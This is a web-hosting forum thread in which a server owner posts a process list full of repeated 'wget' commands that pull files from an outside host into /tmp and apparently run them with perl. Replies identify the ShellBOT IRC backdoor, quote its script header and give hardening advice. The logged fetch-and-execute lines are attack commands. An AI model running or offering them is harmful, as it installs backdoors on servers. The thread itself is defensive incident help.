I fount it in my process list.
I don't know what's that:

nobody 25952 0.0 0.1 3060 1416 ? S 10:20 0:00 wget felicidade.punhetodromo.com.br -O /tmp/php5378
nobody 25956 0.0 0.1 2308 1028 ? S 10:20 0:00 sh -c wget infelicidade.punhetodromo.com.br -O /tmp/php5379;
nobody 25957 0.0 0.1 3060 1416 ? S 10:20 0:00 wget infelicidade.punhetodromo.com.br -O /tmp/php5379
nobody 25968 0.0 0.1 2304 1024 ? S 10:21 0:00 sh -c wget felicidade.punhetodromo.com.br -O /tmp/php5378;per
nobody 25969 0.0 0.1 3060 1416 ? S 10:21 0:00 wget felicidade.punhetodromo.com.br -O /tmp/php5378
nobody 25971 0.0 0.1 2304 1024 ? S 10:21 0:00 sh -c wget felicidade.punhetodromo.com.br -O /tmp/php5378;per
nobody 25972 0.0 0.1 3060 1416 ? S 10:21 0:00 wget felicidade.punhetodromo.com.br -O /tmp/php5378
nobody 25978 0.0 0.1 2308 1028 ? S 10:21 0:00 sh -c wget infelicidade.punhetodromo.com.br -O /tmp/php5379;
nobody 25979 0.0 0.1 3060 1416 ? S 10:21 0:00 wget infelicidade.punhetodromo.com.br -O /tmp/php5379
nobody 25983 0.0 0.1 2308 1028 ? S 10:21 0:00 sh -c wget infelicidade.punhetodromo.com.br -O /tmp/php5379;
nobody 25984 0.0 0.1 3060 1416 ? S 10:21 0:00 wget infelicidade.punhetodromo.com.br -O /tmp/php5379
exim 25999 0.0 0.1 3716 1436 ? S 10:22 0:00 /usr/local/exim/bin/exim-4.43-1 -bd
nobody 26002 0.0 0.1 2304 1024 ? S 10:22 0:00 sh -c wget felicidade.punhetodromo.com.br -O /tmp/php5378;per
nobody 26003 0.0 0.1 3060 1416 ? S 10:22 0:00 wget felicidade.punhetodromo.com.br -O /tmp/php5378
nobody 26008 0.0 0.1 2308 1028 ? S 10:22 0:00 sh -c wget infelicidade.punhetodromo.com.br -O /tmp/php5379;
nobody 26009 0.0 0.1 3060 1416 ? S 10:22 0:00 wget infelicidade.punhetodromo.com.br -O /tmp/php5379
nobody 26011 0.0 0.4 9852 4400 ? S 10:22 0:00 /servers/apache/bin/httpd
exim 26019 0.0 0.1 3716 1436 ? S 10:23 0:00 /usr/local/exim/bin/exim-4.43-1 -bd
nobody 26020 0.2 0.5 9396 4544 ? S 10:23 0:00 /servers/apache/bin/httpd
nobody 26027 0.0 0.1 2304 1024 ? S 10:23 0:00 sh -c wget felicidade.punhetodromo.com.br -O /tmp/php5378;per
nobody 26028 0.0 0.1 3060 1416 ? S 10:23 0:00 wget felicidade.punhetodromo.com.br -O /tmp/php5378
nobody 26033 0.0 0.1 2308 1028 ? S 10:23 0:00 sh -c wget infelicidade.punhetodromo.com.br -O /tmp/php5379;
nobody 26034 0.0 0.1 3060 1416 ? S 10:23 0:00 wget infelicidade.punhetodromo.com.br -O /tmp/php5379
exim 26041 0.0 0.1 3716 1436 ? S 10:23 0:00 /usr/local/exim/bin/exim-4.43-1 -bd
nobody 26045 0.0 0.1 2304 1024 ? S 10:24 0:00 sh -c wget felicidade.punhetodromo.com.br -O /tmp/php5378;per
nobody 26046 0.0 0.1 3060 1416 ? S 10:24 0:00 wget felicidade.punhetodromo.com.br -O /tmp/php5378
nobody 26049 0.0 0.1 2308 1028 ? S 10:24 0:00 sh -c wget infelicidade.punhetodromo.com.br -O /tmp/php5379;
nobody 26050 0.0 0.1 3060 1416 ? S 10:24 0:00 wget infelicidade.punhetodromo.com.br -O /tmp/php5379



What sholud I do?

Hi Basf,

Delete those unwanted files in the /tmp directory and remount the /tmp, /dev/shm partiton as noexec,nosuid. Also make sure that you are running updated version of php and apache versions. ;)

yep its a hack.. here is the header to the file they are trying to download


#!/usr/bin/perl
#
# ShellBOT
# 0ldW0lf - old-wolf@zipmail.com
# - www.atrix-br.********
# - www.atrix.********
#
#
# isso eh meu B0tchZ reformulado
#
###############################
# killah... vai c ferrah :) #
###############################


Do this.. a webserver does not need users other then root to run wget

chmod 700 /usr/bin/wget

also the same with the compiler

chmod 700 /usr/bin/gcc
chmod 700 /usr/bin/g++

that is if you have the compiler installed

Greetings:

In addition to securing your /tmp, /var/tmp, and /devshem along with ensuring your compilers and fetch utilities like wget cannot be accessed by anybody but root, you may also want to consider the following:

Installing and configuring mod_security from http://www.modsecurity.org/

Setting up egress filtering on your firewall.

Thank you.

Are you running any outdated phpbb by chance?

Originally posted by zupanm
Do this.. a webserver does not need users other then root to run wget

chmod 700 /usr/bin/wget

also the same with the compiler

chmod 700 /usr/bin/gcc
chmod 700 /usr/bin/g++

that is if you have the compiler installed For wget: chmod 700 /usr/bin/wget may not be a good idea.

Reason being is that with Linux FC for example, the GET command is no longer included or necessary as "wget" works just fine for PHP scripts running Cron jobs. With permission of 700 the Clients on the Server could not run their Crons. One could install GET manually but that would be going backward.


For the Complier situtation, if you are running any version of WHM then do this:

WHM > Server Setup > Tweak Security > Compilers Tweak: disable for unprivileged users

More information on SHellBOT from Sophos:

Troj/Shellbot-A is a backdoor Trojan for the UNIX platform.

The Trojan connects to a preconfigured IRC server and joins a channel in which it waits for further instructions. These instructions can cause the Trojan to execute arbitrary commands or perform network floods on a specified target.